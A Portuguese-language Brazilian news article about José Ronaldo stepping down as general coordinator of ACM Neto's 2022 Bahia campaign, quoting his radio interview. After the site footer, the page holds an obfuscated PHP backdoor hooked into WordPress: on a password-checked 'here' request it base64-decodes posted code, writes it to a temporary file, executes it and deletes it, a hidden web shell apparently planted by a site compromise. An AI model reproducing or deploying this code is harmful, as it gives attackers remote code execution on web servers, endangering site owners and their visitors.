• SEJA BEM-VINDO

José Ronaldo deixa coordenação geral da campanha de ACM Neto; entenda o caso (áudio)

Publicado em: 14/10/2022 Atualizado:: outubro 14, 2022

 

O ex-prefeito de Feira de Santana, José Ronaldo, que coordenou a campanha geral do ex-prefeito de Salvador, ACM Neto (UB), confirmou nesta sexta-feira (15), em entrevista à rádio Sociedade News, de que deixou a coordenação geral da campanha. [Confira entrevista de José Ronaldo sobre a decisão no final da matéria].

 

Nas redes sociais circula um card anunciando a mudança:

 

 

Questionado sobre a decisão José Ronaldo explicou:

 

“Desde os últimos 10 dias da eleição estou em Feira de Santana para fazer uma campanha fixa em Feira e região. Não seria possível cuidar da campanha em nível estadual. Temos muitos amigos que tem participado ativamente dentro desse processo, desde o início como Paulo Souto (UB), Fábio Mota, Kaká Leão (PP), Caio Moraes, uma série de pessoas que têm contribuído muito dentro desse processo político, cada um na sua área fazendo todo o processo administrativo e de gestão da campanha política. Ao vir para Feira de Santana, diante de uma posição pessoal, de querer ficar os últimos dias da campanha, evidentemente que queria me dedicar de corpo e alma a cidade de Feira e região, agora no segundo turno praticamente fixo. Hoje estive em reunião com pessoas de vários municípios, atendendo a todos, debatendo a campanha política, organizando as visitas, neste sábado (15) ACM Neto estará meio-dia na cidade de Serrinha e por volta das 15 horas na cidade de Santo Estevão. No domingo, estará na cidade de Conceição do Coité fazendo atos de campanha política, e eu atuei ao lado dos amigos de Santo Estevão, Serrinha, Conceição do Coité, na organização desses eventos”, disse Ronaldo.

 

SN – Esse afastamento não mostra um sinal de fraqueza?

José Ronaldo – Muito pelo contrário, dá muito tesão para ganhar a eleição e extremamente confiante na vitória dia 30, não tem nada a ver uma coisa com a outra, isso é uma decisão política, porque resolvemos dividir o estado, fiquei nesta região, uns na Região do Oeste, outros no Sul, Extremo Sul, Baixo Sul, Nordeste da Bahia, outros na região de Juazeiro. Fizemos uma divisão dentro desse processo político porque entendemos que no segundo turno seria melhor fazer esse trabalho regionalmente, uma vez que não temos eleição para deputado estadual e federal, não existe nenhuma sandália de Lampião.

 

O atual presidente do Esporte Clube Vitória, que foi colocado na política por Geddel Vieira Lima, também é citado no afastamento.

 

Confira entrevista completa na rádio Sociedade News de Feira de Santana:

 

 

…………………………………..

 

Fonte: Salvador Notícia

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}